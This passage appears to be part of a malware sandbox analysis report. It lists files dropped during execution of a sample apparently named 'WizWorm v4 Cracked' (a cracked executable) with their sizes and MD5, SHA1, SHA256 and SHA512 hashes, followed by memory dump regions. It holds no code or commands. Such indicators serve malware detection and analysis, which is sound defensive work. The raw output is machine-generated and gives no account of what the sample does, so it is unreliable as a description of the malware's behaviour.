b11d0c6ed48b358a569117c49a92cdc2

SHA1
e4c0bdcd08de5a9c66e61e483583f20b0afdda03

SHA256
a0cd9a78eedbb8267657c89ddf15be8565690bc8c9f6c55a09dcaa37eaff2f8b

SHA512
f820d9d8bd3701d175d750b8b8fd511aff6445c66a147ead4d4b04634474cb1b94a1d71a1adce6c8f7c7f3d26fb163f908015d64da714d0c09023b48da37912f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_admdw04l.xvn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\perfc007.dat

Filesize
48KB

MD5
54eaefa841aa52bb3580aaa0e64094d1

SHA1
2bf779d07fe707a2adec9045ea06e95f219c1d18

SHA256
783878d5cdfa9dcf40d7ff3e7b5bfcf692c70188d1bab5dd7c646735122a8870

SHA512
a539aec842b76a000a61ca00f39a2557390e26a4ab34e3722bf3b252bd580a575951f7ad72853c256e0f0f03aa3a1552178965ca74696cf372ae00328bc28f6a

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
51KB

MD5
9abcc480d2a0cede7fd7393e50c0333c

SHA1
de6d9114c9632e4683fd7a03251d0de34893f64e

SHA256
2ddbd04182af159fbd282610381b9a265ebced2338fcafccba93556ac710f09f

SHA512
4be9e6a999a89188b0bf20849f6663914a44c67acd382514fd554d87fb72bff3ca1cdc9a11e163085e5638ef8c16d35383bf9611e409aa07b249dcd9c2dfdc49

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
47KB

MD5
0cfd5298e63f44351ebca47f6a491fbe

SHA1
b86c08b13f0e60f664be64cb4077f915f9fc1138

SHA256
562261cc16c6e5e2e3841a1ba79083293baa40330fb5d4f7f62c3553df26ccb3

SHA512
549e5c28598ac2a6b11936aa90f641dfa794c04dd642309d08ef90a683d995d8f2d3a69ee2ecd74adae5beb19e9de055e71670922d738bd985657ffe75ebe235

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
46KB

MD5
afc0429d5050b0057aea0a66a565c61a

SHA1
73f4910cee7b27a049d6dfe291bb6c8a99c6dc8b

SHA256
f6847323dd961aef9230bca3409a01b7c4e5e16dcca8a2e2417c9dc750871cf6

SHA512
a33920642f3ec69c04ff61b09149a57ea91e76bb8d51f1d393a31b5079a3f83939863d6a924bf2a2982786b2825bb634e3d0c0920c7bc0bf6a91e214ef8555bd

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
39KB

MD5
9dfe221cfb4a4c2814eb99052a7a0ede

SHA1
d7066fccc9e53e307da42b0bf09cc327480921b9

SHA256
c4d0bb71ffac1bfc75f4d0860e7f95d30724e4d90a2614fb5273d850bc11f391

SHA512
aa4423c10ff97e670620ce25198c308a23e993448eccfb8df2b6d201e908d17062a9f1fdfbce37a11075e223004b311349567cad1630b073ad60793959d69999

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
320KB

MD5
b9a5000ea316ac348cf77beb0e5bc379

SHA1
4e666af14169eb10a0a08ac2f5ed5ecf4764df46

SHA256
1b25a6879c667258cdb900683004ef007c6b3a1a933d823b124d9a6acf9de608

SHA512
9fd911586a0aebec11c48e9f78de3b3f6e41c98a2770f5ac10d0a3947b4b3f326a8c5028c478c8634fb84a071186606e69a7aff83b1cf972d4728e3923503118

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
310KB

MD5
1ad05e460c6fbb5f7b96e059a4ab6cef

SHA1
1c3e4e455fa0630aaa78a1d19537d5ff787960cf

SHA256
0ae16c72ca5301b0f817e69a4bac29157369ecfbadc6c13a5a37db5901238c71

SHA512
c608aa10b547003b25ff63bb1999a5fff0256aadd8b005fdd26569a9828d3591129a0f21c11ec8e5d5f390b11c49f2ef8a6e36375c9e13d547415e0ec97a398f

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
360KB

MD5
1402add2a611322eb6f624705c8a9a4e

SHA1
d08b0b5e602d4587e534cf5e9c3d04c549a5aa47

SHA256
0ac43c8e77edb2c1468420653fc5d505b26cdc4da06c4121ce4bbecae561e6cb

SHA512
177d5ea7e77eee154042b5e064db67a5cac9435890a2ff65cd98da21433f4e7de743e9df22ac0ac61be89fc0be8655b46454ed4a930d13fc7c1dfebe5896781f

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
363KB

MD5
d0a8d13996333367f0e1721ca8658e00

SHA1
f48f432c5a0d3c425961e6ed6291ddb0f4b5a116

SHA256
68a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9

SHA512
8a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
353KB

MD5
a5389200f9bbc7be1276d74ccd2939b4

SHA1
8d6f17c7d36f686e727b6e7b3a62812297228943

SHA256
494db162e2ccd95e69404a34170b6e59847f444881834f3c175c6bc70d783087

SHA512
fc1d1e81362d186410b4af3d6add3c8b32fdd75ea79b7e868cc16615358264af04f47170229d32dffcbf7e1ba2b841ccd2d4f27b0f8d82a0685806c22d3d0a92

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
158KB

MD5
41f2dbe6f02b3bb9802d60f10b4ef7a2

SHA1
f1b03d28e5be3db3341f3a399d1cc887fe8da794

SHA256
eca01d5405d7e8af92ea60f888f891415ea2e1e6484caff15cbaf5a645700db2

SHA512
1c7b85e12050d670d48121e7670e1dab787e0a0b134e0ab314dc571c3969d0f9652ff76666bb433aac5886ca532404963a3041a1d4b4352e3051c838965fd3b1

Download Submit
C:\Windows\WizWorm v4 Cracked - by llcooljake.exe

Filesize
559KB

MD5
9abc7e91bb07b862fc360fcfe40fa6de

SHA1
c1ef0d3891eddc952990ad1175f1e742e868757e

SHA256
f02b73d94e66ec8c554ed76a2305e8ffd1850db9194798106c5043c83c386ac6

SHA512
85c5df09202bdfa328e3af53d00dcc04ee1d1a3491515c1989caca0d54797298962087d300b8ed71d26a65925af2598ec0119fa875c785625abd21292c43b645

Download Submit
C:\Windows\WizWorm.exe

Filesize
14.3MB

MD5
0d7b4b1882f63bdd50b95c566d71ae14

SHA1
fd44458018d9ba5beee8a67b7f22bb5c6e1f850d

SHA256
4a095cf379d66c7123416fec489a8ef6b767fec71959e13714127d6c3bb41c06

SHA512
97ad65c805be31d1d530077b4736ff4c844c51a2d4550e856933f08a328e4c74ecef7e22040a27e9a03509170c4bc780e26b0389cb57385d5217f56d68a7aeda

Download Submit
C:\Windows\system32\perfc007.dat

Filesize
137KB

MD5
cacc87a7a4824d4fca6da760d909821d

SHA1
a1f2ccfa48a2d8877425f16e0723e3b3ce8f0f67

SHA256
1f431b499e240794a4f798579cdb642dcac1b271451291327404c98605e5ebf6

SHA512
7ac2c48b41a1b13af9c8a0097d913ff5c8fbe72456faf49d0dda213ffe6ed4d2373f16963d42c5d9d09cccbc8d70ede86eba03c815a4c9b2c6af8a5d739c76ee

Download Submit
C:\Windows\system32\perfc007.dat

Filesize
64KB

MD5
ecd5bf34acf95887807a230957ebff8f

SHA1
7dfeb562c0f74fb68a16642641a4c128d9cdc2e8

SHA256
4895b3c82cbc48ea66ca93d093a5eac45bee9c22ab9dca8e204681b5dd9e3d27

SHA512
58ee753b4a0d61e750a465d6553e537a27bc88a3635c7cfc0e91ec33c62bac007be7932bb543551f097e594aa89d361fe05a0e03fbf9fe4fef24e7782b46100f

Download Submit
C:\Windows\system32\perfc009.dat

Filesize
32KB

MD5
1e60bc5e525063b96078df17fbd3c4e1

SHA1
bae8eda409cb3e016ddd420c6354aeaac2d267b9

SHA256
a0894847ca6208cf7e519d8e825458596bbcd78156a453e32872de7592ea20d8

SHA512
5758d535e4ce20cc30b9b57fea1811feffb2655ecc6eec69c942defb4b4f8c06e8e37860f85ec7cad26df9d7635ecaf131a68ec4ee291aa36e448c7ef2339652

Download Submit
C:\Windows\system32\perfc00A.dat

Filesize
42KB

MD5
08728aef33bbac5884423c1597e74a29

SHA1
64d28ea3dc5c4392a0210b4d26db146b26e40f0b

SHA256
fbd64fca18300003ddcdddf3b25ad501cf224035ef5975dedc64c7d139eb69e6

SHA512
001cc1ef7a69ce59a9e37133a8cdf14cc8e7a09bc74d4678d9af25da3eaa9d99efc6fdf64fd2e301acb796cef4a988d502b63a61dcce14511568130bb1551a0c

Download Submit
C:\Windows\system32\perfc00A.dat

Filesize
47KB

MD5
69c02ba10f3f430568e00bcb54ddf5a9

SHA1
8b95d298633e37c42ea5f96ac08d950973d6ee9d

SHA256
62e5660f9018da67d3c6727c39e9690650beb62749df0b4c00e6085f36c8e94e

SHA512
16e4d29324c2b50e1347532cd0982a149a7c67c4f27a743bbad8609ac662c3e00fa1be645b1b5f23adca3abd60c812f3f87d669f5ffb42b90ca5026dcbf2824e

Download Submit
C:\Windows\system32\perfc00C.dat

Filesize
39KB

MD5
9f9af8517189b0d61b2615007e071084

SHA1
a33753ca07f370b7d99f6658b32abb97eed7bbc4

SHA256
b6dc84d6c21f558e69174d3b62e13fbb8aecd5e49de0fb737f56445a9b883034

SHA512
640f51590a6f5d61e9dcb9a463a6b7aae6d88749843d1ec62f30a00c95b4a449b442281ac61058db4da464bee03e62a1f43a91b0a05914d4dbda2bce007d745d

Download Submit
C:\Windows\system32\perfc010.dat

Filesize
38KB

MD5
4f32511bd6124c1b65c8f7fcd244a82b

SHA1
6d840ddec80ee4f6ab99a1d0b55c50a568edd722

SHA256
8ceaa2e1a9cc8b7f76e6a2551bb1dfbcc64896c8c3fd5901e417f41ddff35e6d

SHA512
ca8c8103a4ec3b8f1a070ee2a3301f8af64e08cfd40b21022e5d9f54e3decfc55b7571112d186aba9d7b4c7b5720f7eb0ff3847b39366dd04b912dde386a73e3

Download Submit
C:\Windows\system32\perfc011.dat

Filesize
32KB

MD5
50681b748a019d0096b5df4ebe1eab74

SHA1
0fa741b445f16f05a1984813c7b07cc66097e180

SHA256
33295c7ee1b56a41e809432bc25dd745ba55b2dc91bfa97aa1f55156880cd71a

SHA512
568439b3547dcbcce28499d45663fdd0e2222f6c5c90053769ce2585f65721f679c071393328bde72c9a3f03da4c17abb84b8303897688b59598887ceb31438e

Download Submit
C:\Windows\system32\perfh007.dat

Filesize
666KB

MD5
77beedf7f53f3cc4b858f8f285448f3c

SHA1
e0921ce65295184911bf45599857bdf1a4cadd3f

SHA256
e9378e37a1ace060073a032886af07e0928d3f085bbbd73a61f0ccb2ff525e67

SHA512
2f42646f989b15fd875a40cb980bf203acc0cf421c7eeadb0d36d926199a4f6366d71b2dd97e2255ef90d9e3ada085016287b566645083004f0ee86f6c425aae

Download Submit
C:\Windows\system32\perfh007.dat

Filesize
298KB

MD5
eadd51b4e0a81aa0a1ec7392a1ce681a

SHA1
f384c3bc0f16ccb5049ebbf7df776e684da84706

SHA256
1a2fd21891c4055b2ee03ee06665f1a09a6503f7a4b57acba67820ec561d12e4

SHA512
de74112ed8f81f4723241102e9e493921419f836e7f095000a0ae34616db1886c22dff6ab4dfd5bd1ebbc9840498c3606ac0e5791f7fadac1b52c18043571ae4

Download Submit
C:\Windows\system32\perfh009.dat

Filesize
290KB

MD5
56c3b96dd714b0da77c0b9fb0d392c86

SHA1
6dfd6e883c67ea4aef8a03d28874a677441e512f

SHA256
1bc70ca290a7b4afc37049a8435c81d9b863520609d2e4f627d08cd21c07a58e

SHA512
c2036039da93d0c594b99aad74f1bb807c7230a746d749cec57a5f6012e8dfc401f9430fe1c7090280532ffdb044f7a4970e17e5cede82581793d69e9bc6d10a

Download Submit
C:\Windows\system32\perfh009.dat

Filesize
297KB

MD5
50362589add3f92e63c918a06d664416

SHA1
e1f96e10fb0f9d3bec9ea89f07f97811ccc78182

SHA256
9a60acb9d0cb67b40154feb3ff45119f122301ee059798c87a02cc0c23e2ffce

SHA512
e21404bc7a5708ab1f4bd1df5baff4302bc31ac894d0940a38b8967b40aac46c2b3e51566d6410e66c4e867e1d8a88489adccf8bdcaec682e9ddabc0dac64468

Download Submit
C:\Windows\system32\perfh00A.dat

Filesize
338KB

MD5
757de55399f7c5167e7cdfa65f184108

SHA1
06876adabd18e79946cc5280861145432257d210

SHA256
e7c22cb8443fb549de7a3e826645450ed47169ce0168c740096de44addd360dd

SHA512
51977c1104108e5b5ab0042e6d10ec95195be8c62dbd547b85626cc02b35e46cb363be8804f360220ce347709da3ba1626f253477b7512cdd414f1ad96cf4571

Download Submit
C:\Windows\system32\perfh00C.dat

Filesize
342KB

MD5
9a780b14eeafa8b9a2409f02bf9d9af0

SHA1
f52c28235879e45685ee0163f97c31099baa616d

SHA256
a04ee6316af61e7a475d47ab74744ea485b419566f5e40c96ec09b400926b932

SHA512
f316652ec8dc3af06842de056329230152e74f53530c4f099a2ee73a96106f2fc3dbf244dce75c10e3131cdfbaa3b4a28d8ff116f8d6d7ae7b5553688c170d7a

Download Submit
C:\Windows\system32\perfh010.dat

Filesize
333KB

MD5
70ac53e2ebbd863ff7f319d68aed16f7

SHA1
90109a5028b07e8aa36846fe5096e04bd97839d6

SHA256
a4e35710b8277d733eec1c165459f85d9660fbe264ccabe0a624626e93763e37

SHA512
8fc6d4c665a642e86acfffa35ce6c6d7bf49c1a414de8b15fb5cda8d121f4d671914aafe0625ad11e87fd74f0bba2d40b9a71f373d1ae67a12b238b023682af1

Download Submit
C:\Windows\system32\perfh011.dat

Filesize
141KB

MD5
ab91dd7fa8878b8d14608522cc38102e

SHA1
c4cf62ad6183a2d341fb3de756cb672516897183

SHA256
7aae74ee957962add631778e45a174693a15a2e9ca48e151f2fb5e31488eecf7

SHA512
f1202cbb56c93182d1aec675d9d069d1156d2cbe11cc6b05358f0e83786e4a04b0a6ba42be378574d01b8d17a3f2e38110d45f7d7a10cd89f8d7d8c83ff35455

Download Submit
memory/2084-13-0x0000000000750000-0x000000000163E000-memory.dmp

Filesize
14.9MB

Download
memory/2084-14-0x00007FFD99820000-0x00007FFD9A2E1000-memory.dmp

Filesize
10.8MB

Download
memory/2084-58-0x00007FFD99820000-0x00007FFD9A2E1000-memory.dmp

Filesize
10.8MB

Download
memory/2084-12-0x00007FFD99823000-0x00007FFD99825000-memory.dmp

Filesize
8KB

Download
memory/4408-56-0x0000000000E10000-0x0000000000EA2000-memory.dmp

Filesize
584KB

Download
memory/4472-63-0x0000017C3D800000-0x0000017C3E9F2000-memory.dmp

Filesize
17.9MB

Download
memory/4472-59-0x0000017C224C0000-0x0000017C2331E000-memory.dmp

Filesize
14.4MB

Download
memory/4796-32-0x0000013C58D30000-0x0000013C58D52000-memory.dmp

Filesize
136KB

Download